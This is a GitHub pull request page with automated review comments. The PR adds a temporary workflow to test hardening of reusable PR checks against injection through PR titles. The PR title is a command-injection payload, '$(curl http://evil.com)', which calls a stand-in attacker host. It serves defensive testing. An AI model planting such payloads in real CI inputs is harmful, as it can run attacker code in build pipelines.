Repository navigation
$(curl http://evil.com) - #625
GAdityaVarma wants to merge 1 commit into
Conversation
There was a problem hiding this comment.
Pull request overview
Adds a temporary GitHub Actions workflow to exercise the organization’s reusable PR checks as part of “PR workflow security hardening” testing.
Changes:
- Introduces a new PR-triggered workflow to run the reusable JIRA ID check workflow.
- Introduces a new PR-triggered workflow to run the reusable copyright check workflow with elevated PR/issue permissions.
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| name: Test PR Workflows (TEMPORARY - DELETE AFTER TESTING) | ||
|
|
||
| on: | ||
| pull_request: |
There was a problem hiding this comment.
This workflow is triggered on pull_request, but the repo’s main PR workflow uses pull_request_target specifically to support PRs from forks (.github/workflows/pr-workflow.yaml:4-6). With pull_request, GITHUB_TOKEN is read-only on fork PRs, so the test-copyright-check job won’t actually receive the requested pull-requests: write / issues: write permissions and the reusable workflow may fail to comment/update checks. Consider using pull_request_target (with the reusable workflow designed to avoid checking out untrusted code) if you need this to behave like the main PR workflow.
| pull_request: | |
| pull_request_target: |
| uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@fix/SECCMP-1797-pwn-request-injection | ||
| with: | ||
| pr-title: ${{ github.event.pull_request.title }} | ||
|
|
||
| test-copyright-check: | ||
| name: Test Copyright Check | ||
| uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@fix/SECCMP-1797-pwn-request-injection |
There was a problem hiding this comment.
The reusable workflows are referenced via a mutable branch ref (@fix/SECCMP-1797-pwn-request-injection). For workflow security hardening, pin reusable workflow calls to an immutable ref (a commit SHA or a protected, versioned tag) to avoid supply-chain risk if the branch changes.
| uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@fix/SECCMP-1797-pwn-request-injection | |
| with: | |
| pr-title: ${{ github.event.pull_request.title }} | |
| test-copyright-check: | |
| name: Test Copyright Check | |
| uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@fix/SECCMP-1797-pwn-request-injection | |
| uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection> | |
| with: | |
| pr-title: ${{ github.event.pull_request.title }} | |
| test-copyright-check: | |
| name: Test Copyright Check | |
| uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection> |
| pull_request: | ||
| types: [opened, edited, reopened, synchronize] |
There was a problem hiding this comment.
This file is labeled as TEMPORARY but is wired to run on every PR event type listed. If it’s only for ad-hoc validation, consider gating it (e.g., workflow_dispatch, branch/actor filtering, or a short-lived test branch) to avoid duplicating checks and increasing Actions noise/cost if merged accidentally.
| pull_request: | |
| types: [opened, edited, reopened, synchronize] | |
| workflow_dispatch: |
Testing PR workflow security hardening
tested as part of https://progresssoftware.atlassian.net/browse/PDP-1182 jira